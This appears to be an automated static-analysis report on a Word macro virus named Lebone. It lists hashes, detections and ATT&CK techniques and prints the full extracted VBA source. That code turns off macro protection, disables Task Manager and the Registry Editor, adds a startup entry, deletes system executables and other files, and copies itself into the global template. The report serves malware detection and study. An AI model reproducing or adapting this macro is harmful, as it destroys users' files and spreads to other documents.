Lebone — Office (OLE) malware analysis

Static analysis result for SHA-256 908141af031ad463…

MALICIOUS

Office (OLE)

Size: 37.5 KB
Created: 2005-05-15 19:02:00
Authoring application: Microsoft Word 10.0
First seen: 2012-06-14
MD5: b2bee31e81a2ff6f118b3e23af5816cc
SHA-1: bd3b567f9d336e74af89c4b4774b586d8ce39e54
SHA-256: 908141af031ad46330de931fdf10c9ac1fc71dddeb9410027a7450bb50e77fd0
Risk score: 256

Malware Insights

Lebone · confidence 95%

MITRE ATT&CK
T1547.001 Registry Run Keys / Startup Folder
T1059.005 Visual Basic

This document contains legacy WordBasic macro virus markers and a VBA AutoOpen macro. The script attempts to disable the Task Manager and Registry Editor by writing to specific registry keys, likely to hinder user intervention. It also displays a misleading message about a virus, aiming to alarm the user. The ClamAV detection as Win.Trojan.Pivis-2 and Doc.Trojan.Lebone-1 further confirms its malicious nature.

Heuristics 6

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
            .VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6205 bytes
SHA-256: af839db6b45e6ff490a7893aca61778c81f3a6d64633aa7c3ecb7847e7f1c097
Detection
ClamAV: Doc.Trojan.Lebone-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Libon"

'Macro virus name: Lebone
'-------------------------
'Infecta documentos word.
'Infect word documents.
'2005
'-------------------------

Sub AutoOpen()
Attribute AutoOpen.VB_Description = "Macro Lebone"
Attribute AutoOpen.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoOpen"
On Error Resume Next
With Options
        .ConfirmConversions = False
        .VirusProtection = False
        .SaveNormalPrompt = False
   End With

MsgBox " Virus alterou seu computador !!", vbOKOnly + vbCritical, "Word texto informa!!"

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&

System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr") = "1"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools") = "1"

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Lune") = "Virus ativado"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOrganization") = "Universal"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "RegisteredOwner") = "Astral"
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "Version") = "13A31-Infected "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "VersionNumber") = "1313BA13 Astral "
System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion", "ProductName") = "Electron"

System.PrivateProfileString("", "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run", "Visual") = "C:\ARQUIV~1\Lube.html"
Open "C:\ARQUIV~1\Lube.html" For Output As #1
 Print #1, "<html><head><title>Macro virus!</title></head><body bgcolor='#FF0000' link='#FFFF00' vlink='#FF0000'>"
 Print #1, "<h6 align='center'><font color='#EEEE00' size='15'><marquee behavior='alternate' width='90%'>Computador com problemas!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>##############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color='#000000' size='15'><marquee behavior='alternate' width='90%'>Word modificado com sucesso!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color='#00FF00' size='15'><marquee behavior='alternate' width='70%'>Word macro virus!</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Print #1, "<h6 align='center'><font color=blue size='7'><marquee behavior='alternate' width='100%'>###############################################</marquee></font>"
 Close #1

ActiveDocument.Shapes.AddTextEffect _
PresetTextEffect:=msoTextEffect9, _
Text:="A vida pode ser feliz!!", FontName:="Arial Black", _
FontSize:=36, FontBold:=msoTrue, _
FontItalic:=msoFalse, Left:=1, Top:=1, _
Anchor:=ActiveDocument.Paragraphs(1).Range

WordBasic.Kill "C:\WINDOWS\*.exe"
WordBasic.Kill "C:\WINDOWS\SYSTEM\*.exe"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.exe"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\COMMAND\*.com"

If Day(Now()) = 6 Or (Day(Now)) = 13 Or (Day(Now)) = 17 Or (Day(Now)) = 23 Or (Day(Now)) = 28 Then
MsgBox " Virus modificou seus arquivos!!", vbOKOnly + vbCritical, "Word texto informa!!"
WordBasic.Kill "C:\WINDOWS\*.com"
WordBasic.Kill "C:\WINDOWS\*.ini"
WordBasic.Kill "C:\WINDOWS\*.txt"
WordBasic.Kill "C:\WINDOWS\*.gif"
WordBasic.Kill "C:\WINDOWS\*.xls"
WordBasic.Kill "C:\WINDOWS\*.pdf"
WordBasic.Kill "C:\*.com"
WordBasic.Kill "C:\*.ini"
WordBasic.Kill "C:\*.txt"
WordBasic.Kill "C:\*.gif"
WordBasic.Kill "C:\*.xls"
WordBasic.Kill "C:\*.pdf"
     
End If
End Sub

Sub AutoClose()
Attribute AutoClose.VB_Description = "Macro Lebone"
Attribute AutoClose.VB_ProcData.VB_Invoke_Func = "Project.Libon.AutoClose"
On Error Resume Next

ActiveDocument.SaveAs FileName:="C:\Lubir.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\System\Igon.sys"
ActiveDocument.SaveAs FileName:="C:\Program Files\Lubi.sys"
ActiveDocument.SaveAs FileName:="C:\Windows\Command\Nidun.sys"

iMacroCount = WordBasic.CountMacros(0, 0)
For i = 1 To iMacroCount
    If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
        binstalled = -1
    End If
    If WordBasic.[MacroName$](i, 0, 0) = "Libon" Then
        bTooMuchTrouble = -1
    End If
Next i
If Not binstalled And Not bTooMuchTrouble Then
    sMe$ = WordBasic.[FileName$]()
    sMacro$ = sMe$ + ":Libon"
    WordBasic.MacroCopy sMacro$, "Global:Libon"
    sMacro$ = sMe$ + ":AutoClose"
    WordBasic.MacroCopy sMacro$, "Global:Libon"
   
   ActiveDocument.Save

End If

End Sub

Sub Toolsmacro()
Attribute Toolsmacro.VB_Description = "Macro Lebone"
Attribute Toolsmacro.VB_ProcData.VB_Invoke_Func = "Project.Libon.macro"
On Error Resume Next
CommandBars("Macro").Controls("Security...").Enabled = False
End Sub

'Infecta documentos word.
'Infect word documents.
'Word Macro virus
'=========================
'Ano 2005
'-------------------------